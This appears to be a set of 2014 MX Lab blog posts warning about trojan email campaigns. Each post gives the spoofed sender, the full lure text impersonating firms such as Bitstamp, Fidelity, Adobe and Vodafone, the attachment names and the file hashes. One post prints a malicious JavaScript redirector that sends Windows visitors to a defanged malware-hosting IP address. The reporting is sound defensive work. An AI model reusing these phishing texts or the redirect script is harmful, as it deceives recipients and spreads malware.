Fake email regarding Bitstamp new banking details contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “New bank details”.

This email is send from the spoofed address “”Bitstamp.net” <no_reply@bitstamp.net>”, while the real SMTP sender is AmericanExpress@welcome.aexp.com, and has the following body:

New banking details

Dear Bitstamp clients,

We would like to inform you that Bitstamp now has new bank details, please check attached file.

We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.

Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.

Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.

Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED

The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr.

The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S.

At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total. Now, MX Lab has also intercepted some emails without the malicious attachment but be aware that this email is a risk.

Use the Virus Total permalink for more detailed information.
SHA256: 83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769

Fake email from the Pegler Yorkshire Group regarding a daily report contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “FW: Daily report” that is supposed to come from the Pegler Yorkshire Group, a British manufacturer of valves and engineering products.

This email is send from the spoofed address “Ian Howarth <Ian.Howarth@pegleryorkshire.co.uk>” and has the following body:

Please review attached document.

—————————-

http://www.pegleryorkshire.co.uk

Head Office| St. Catherine’s Avenue, Doncaster, South Yorkshire, DN4 8DF, England.

Registered in England Company No. 00401507, Registered Office| Pegler Yorkshire Group Limited, St. Catherine’s Avenue, Doncaster, South Yorkshire, DN4 8DF, England. An Aalberts Industries Company.

DISCLAIMER: The information in this message is confidential and may be legally privileged. It is intended solely for the addressee. Access to this message by anyone else is unauthorised. If you are not the intended recipient, any disclosure, copying, or distribution of the message, or any action or omission taken by you in reliance on it, is prohibited and may be unlawful. Please immediately contact the sender if you have received this message in error. Any views/opinions expressed in this email are solely those of the author and not of the company. The company may monitor communications for business purposes. Copyright in this email belongs to Pegler Yorkshire Group Limited, ALL RIGHTS RESERVED. This e-mail has been scanned for all known viruses by our systems however the company accepts no liability for any damage caused by any virus transmitted by this email.
—————————-

The attached ZIP file has the name F44907162.zip and contains the 22 kB large file F44907162.scr (note: numbers may vary).

The trojan is known as Troj.W32.Gen or HEUR/QVM20.1.Malware.Gen.

At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: c9189ab85dcb7782bd048d1b91b6c2c414d6f7e7197f1e7a11189a92ad43c9f7

UPDATE 21/10/2014 12:20:

The same trojan is also being distributed by email with other content then mentioned above. This is an example that is supposed to come from the company 888 Publishing Ltd and has the same subject line “FW: Daily report”. So we might expect to see more similar emails but with different content.

Please review attached document.
Kind regards,

Carrie Lancaster – Editor
carrie.lancaster@biopharma-asia.com
logo

888 Publishing Ltd
6 Mitre Passage
Greenwich Peninsula
London
SE10 0ER
United Kingdom

T: +44 (0) 203 440 7106
F: +44 (0) 203 440 7115
W: http://www.biopharma-asia.com
CO#: 08048039
Find Us Online
FacebookTwitterGoogle+Linkedin

This message and any files transmitted with it are the property of 888 Publishing Ltd, are confidential, and are intended solely for the use of the person or entity to whom this e-mail is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please contact the sender and delete his message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited.

Fake Fidelity email “401k June 2014 Fund Performance and Participant Communication” contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “401k June 2014 Fund Performance and Participant Communication” regarding a Fidelity fund performance report.

This email is send from the spoofed address “Cora Mccracken <CoraMccracken@fidelity.com>” and has the following body, see below. Note that the subject speaks regarding a report for June while the body of the email and attached ZIP archive are using October so I assume that this is a small mistake.

Co-op 401k Plan Participants -

Attached you will find the October 2014 401k fund performance results as well as an informational piece regarding online calculators available on the website.

If you are a facility manager, please forward, print or post a copy of these pages on your bulletin board or in a conspicuous place where your employees can see them.

Please contact me if you have any questions.

Cora Mccracken

Employee Benefits/Plan Administrator

615.793.3210

The attached ZIP file has the name October-2014-401k-Fund.zip and contains the 23 kB large file October-2014-401k-Fund.scr.

The trojan is known as Win32.Malware!Drop, W32/Trojan3.LNK, Trojan.Upatre.100, W32/Trojan.DXKV-8011 or Win32/TrojanDownloader.Waski.A.

At the time of writing, 12 of the 54 AV engines did detect the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: 782d490bedb9e65bb1640a4d08e0e3debe2c11b270415aeb8bbfb83377469a3b

Latest email “my new photo ;)” contains a new trojan variant


MX Lab, http://www.mxlab.eu, started to intercept a new trojan new variant distribution campaign by email with the subject “my new photo ;)”.

This type of campaign is current running for some time now, see other blog articles on the 26th September, 16th September, 5th September and 22nd August 2014, and still appears in the wild with a very low detection rate by anti virus engines:

This email is send from the spoofed email addresses and has the following short body:

my new photo ;)

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 57 kB large file photo.exe.

The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen.

At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: 83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5.

 

Fake email Adobe Invoice, regarding an Adobe Creative Cloud Service invoice, contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Adobe Invoice” which is quite similar to a previous malicious campaign but in that case a Word document was used.

This email is send from the spoofed address “Adobe Billing <billing@adobe.com>” and has the following body:

Dear Customer,

Thank you for signing up for Adobe Creative Cloud Service.

Attached is your copy of the invoice.
Thank you for your purchase.

Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot:

The attached ZIP file has the name adb-102288-invoice.zip and contains the 117 kB large file c3.exe.

The trojan is known as PE:Malware.FakePDF@CV!1.9C3A or Win32.Trojan.Inject.Auto.

At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total so be careful when handling this email.

Use the Virus Total permalink for more detailed information.
SHA256: 39475a931af23d7d61e2898bcd2e5f69f8e6770848a306980ea8ef6dcfc2bc08

Fake email eFax message contains URL that leads to malicious ZIP archive


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “eFax message from “02086164497” – 1 page(s), Caller-ID: 208-616-4497″.

This email is send from the spoofed address “eFax <message@inbound.*******>” and has the following body:

Fax Message [Caller-ID: 208-616-4497]
You have received a 1 page fax at 2014-10-05 11:34:48 GMT.

* The reference number for this fax is lon2_did11-2974913177-8345459349-35.

Please visit https://www.efax.co.uk/myaccount/message/lon2_did11-2974913177-8345459349-35 to view this message in full.

Thank you for using the eFax service!

Screenshot of the email:

The embedded URL hxxp://lanuez.cl/wp-content/themes/cityhub/mess.html leads to a redirect page with the following script:

<script>(CR)(LF)
var·OSName="Unknown·OS";(CR)(LF)
if·(navigator.appVersion.indexOf("Win")!=-1)·OSName="Windows";(CR)(LF)
if·(navigator.appVersion.indexOf("Mac")!=-1)·OSName="MacOS";(CR)(LF)
if·(navigator.appVersion.indexOf("X11")!=-1)·OSName="UNIX";(CR)(LF)
if·(navigator.appVersion.indexOf("Linux")!=-1)·OSName="Linux";(CR)(LF)
var1=112;(CR)(LF)
var2=var1;(CR)(LF)
if(OSName=="Windows")·{location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}(CR)(LF)
</script>

This script clearly shows that it is targeting Windows users. In all other cases, you’re redirected towards Google with a search query on eFax. The site hxxp://200.59.14.44:8080/ord/ef.html shows us the following layout and allows us to download the malicious fax in ZIP format.

The downloaded ZIP file has the name FAX_20141008_1412786088_26.zip and contains the folder FAX_20141008_1412786088_26 with the 61 kB large file FAX_20141008_1412786088_26.exe. Numbers may vary in the file names.

The trojan is known as Malware.QVM20.Gen.

At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total so de not download any files from this host.

Use the Virus Total permalink for more detailed information.
SHA256: 3dd29684ab081569d4ce723b16f22b7bcc8301df2657177802bc71c7a375307e

Fake email “Kopie Vodafone contract” contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Kopie Vodafone contract”.

This email is send from the spoofed address “noreply.nl@vodafone.com” and has the following body in Dutch and English:

Beste klant,

Bedankt voor je bezoek aan Vodafone Winkel!

Deze e-mail bevat de overeenkomst die je vandaag in Vodafone Winkel ondertekend hebt. Bewaar deze goed!

Wij hechten veel waarde aan de privacy van onze klanten. Daarom versturen we de overeenkomst per e-mail zonder handtekening en is de overeenkomst beveiligd met het wachtwoord dat je in de winkel hebt opgegeven.

Als je onverhoopt het wachtwoord vergeten bent kun je, in de Vodafone Winkel waar je de overeenkomst afgesloten hebt, een kopie opvragen. Vergeet niet een geldig legitimatiebewijs mee te nemen.

Met vriendelijke groet,

Vodafone Winkel


Dear customer,

We thank you for visiting Vodafone Winkel!

This e-mail contains the agreement you signed today in the Vodafone shop. Please store this agreement for future reference.

To protect your privacy, the agreement has been sent without your signature and is secured with the password you agreed upon in the shop. You will need this password to open and view the contents of this document.

In case you forget the password, you can get a copy of the agreement by visiting the Vodafone shop where you signed the agreement. Please bring a valid identification with you.

Best regards,

Vodafone Winkel


LET OP: Dit bericht is verzonden door een geautomatiseerd systeem. Reacties op dit bericht worden niet gelezen of doorgestuurd. Mocht je nog vragen hebben naar aanleiding van dit bericht, ga dan naar je verkooppunt.

Op alle Vodafone producten en diensten zijn Algemene – en Aanvullende Dienst Voorwaarden en de Privacy Statement (samen de “Voorwaarden”) van toepassing. Door (digitale) ondertekening van de overeenkomst bent u met deze Voorwaarden akkoord gegaan. Deze Voorwaarden zijn ook (kosteloos) verkrijgbaar via Vodafone Winkel, Vodafone Klantenservice of via Vodafone website ( http://www.vodafone.nl ).

Disclaimer:
Dit bericht (inclusief de bijlagen) is vertrouwelijk en alleen bedoeld voor de geadresseerde in dit bericht. Als u dit bericht per abuis hebt ontvangen, wordt u verzocht de afzender te informeren en het bericht te wissen. Het is niet toegestaan om dit bericht, geheel of gedeeltelijk, zonder toestemming in te zien, te gebruiken of te verspreiden.
Vodafone Libertel B.V. (“Vodafone”) sluit elke aansprakelijkheid uit wanneer de informatie in deze e-mail niet correct, onvolledig of niet tijdig overkomt, evenals elke aansprakelijkheid voor mogelijke schade die ontstaat ten gevolge van deze e-mail. Vodafone garandeert niet dat het bericht vrij is van manipulatie door derden of computerprogramma’s die worden gebruikt voor het onderscheppen van elektronische berichten en/of het overbrengen van virussen.

PLEASE NOTE: This message has been sent from an automated system. Please DO NOT reply to this message as it is send from an unattended mailbox

All Vodafone products and services are subject to Terms & Conditions (also collectively known as “Voorwaarden”). These Terms & Conditions are also available (free of charge) at the Vodafone shop, Vodafone Customer Service or through the Vodafone website ( http://www.vodafone.nl ).

Disclaimer:
This message and any files or documents attached are strictly confidential or otherwise legally protected. It is intended only for the individual or entity named. If you are not the named addressee or have received this email in error, please inform the sender immediately, delete it from your system and do not copy or disclose it or its contents or use it for any purpose. Please also note that transmission cannot be guaranteed to be secure or error-free.
Vodafone Libertel BV (“Vodafone”) excludes any liability for the information in this email if it is found to be incorrect, incomplete or not delivered in time, and any liability for any damages arising as a result of this email. Vodafone does not guarantee that this message is free from manipulation by third parties or computer programs used to intercept electronic messages and / or spread viruses.

The attached ZIP file has the name document_contract _pdf.zip and contains the 137 kB large file document_contract _pdf.exe.

At the time of writing, 0 of the 54 AV engines did detect the trojan at Virus Total so be very careful upon receiving and handling this email..

Use the Virus Total permalink for more detailed information.
SHA256: cbdd8e2eccaa44f31b4217bd271f665becb2b9ffeaa8eb25c5920ef9b5d7026b

Follow

Get every new post delivered to your Inbox.

Join 340 other followers